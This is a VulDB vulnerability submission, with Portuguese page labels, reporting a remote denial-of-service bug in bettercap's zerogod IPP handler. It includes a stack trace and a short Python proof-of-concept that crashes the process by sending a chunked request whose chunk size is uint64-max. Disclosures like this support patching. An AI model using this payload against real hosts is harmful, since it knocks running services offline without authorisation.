Submeter #811145: bettercap <=v2.41.5 Integer Coercion Errorinformação

Título	bettercap <=v2.41.5 Integer Coercion Error
Descrição	zerogod IPP Chunked Body - Unrecovered Panic via OOB uint64 Allocation The `zerogod IPP` handler crashes entire process on crafted chunked request (remote DoS). @evilsocket ### Environment - Bettercap version: v2.41.5 (bettercap -version) - OS: Linux (tested on Kali 6.18.12 amd64; issue is OS-independent) - Go version: go1.26.1 - Command line: ``` sudo bettercap -iface eth0 -eval "zerogod.advertise /path/to/services.yaml" ``` - Caplet / session commands: none beyond the eval above - services.yaml: ``` - name: "My Printer" service: "_ipp._tcp." domain: "local" port: 63100 ipp: printer-name: "My Printer" printer-info: "Test" printer-make-and-model: "Test Make Test Model" printer-location: "Office" ``` ``` [zerogod] found tcp _ipp._tcp.local protocol handler (tls=false) [zerogod] advertising My Printer._ipp._tcp.local with hostname=kali ipv4=192.168.1.x port=63100 [zerogod] 127.0.0.1 -> panic: runtime error: makeslice: len out of range goroutine 65 [running]: github.com/bettercap/bettercap/v2/modules/zerogod.ippReadChunkedBody(0x2a03cf542cc0) .../modules/zerogod/zerogod_ipp_primitives.go:140 +0xa5 github.com/bettercap/bettercap/v2/modules/zerogod.ippReadRequestBody(0x2a03cf542cc0, 0x2a03cf56f2c0) .../modules/zerogod/zerogod_ipp_primitives.go:166 +0x1fd github.com/bettercap/bettercap/v2/modules/zerogod.ippClientHandler(0x2a03cf542cc0) .../modules/zerogod/zerogod_ipp_handler.go:50 +0x29a created by github.com/bettercap/bettercap/v2/modules/zerogod.(*Acceptor).startTCP.func1 in goroutine 61 .../modules/zerogod/zerogod_acceptor.go:120 +0x53a ``` ### Steps to Reproduce 1. Start bettercap with zerogod advertising any IPP service (see YAML above). 2. Confirm the IPP TCP port is listening (ss -tlnp \| grep 63100). 3. From any machine on the same network, run the following Python snippet: ``` import socket, time s = socket.socket() s.connect(("192.168.1.x", 63100)) # replace with bettercap host IP # Step 1 – send HTTP request with Expect: 100-continue + Transfer-Encoding: chunked s.sendall( b"POST /ipp HTTP/1.1\r\n" b"Host: 192.168.1.x:63100\r\n" b"Content-Type: application/ipp\r\n" b"Transfer-Encoding: chunked\r\n" b"Expect: 100-continue\r\n" b"\r\n" ) # Step 2 – wait for 100 Continue, then send uint64-max as chunk size print(s.recv(4096)) # b'HTTP/1.1 100 Continue\r\n\r\n' s.sendall(b"ffffffffffffffff\r\n") # triggers make([]byte, uint64(max)) → panic
Fonte	⚠️ https://github.com/bettercap/bettercap/issues/1263
Utilizador	dapickle (UID 97309)
Submissão	23/04/2026 08h49 (há 1 mês)
Moderação	10/05/2026 18h05 (17 days later)
Estado	Aceite
Entrada VulDB	362572 [bettercap até 2.41.5 zerogod IPP Service zerogod_ipp_primitives.go ippReadChunkedBody Negação de Serviço]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!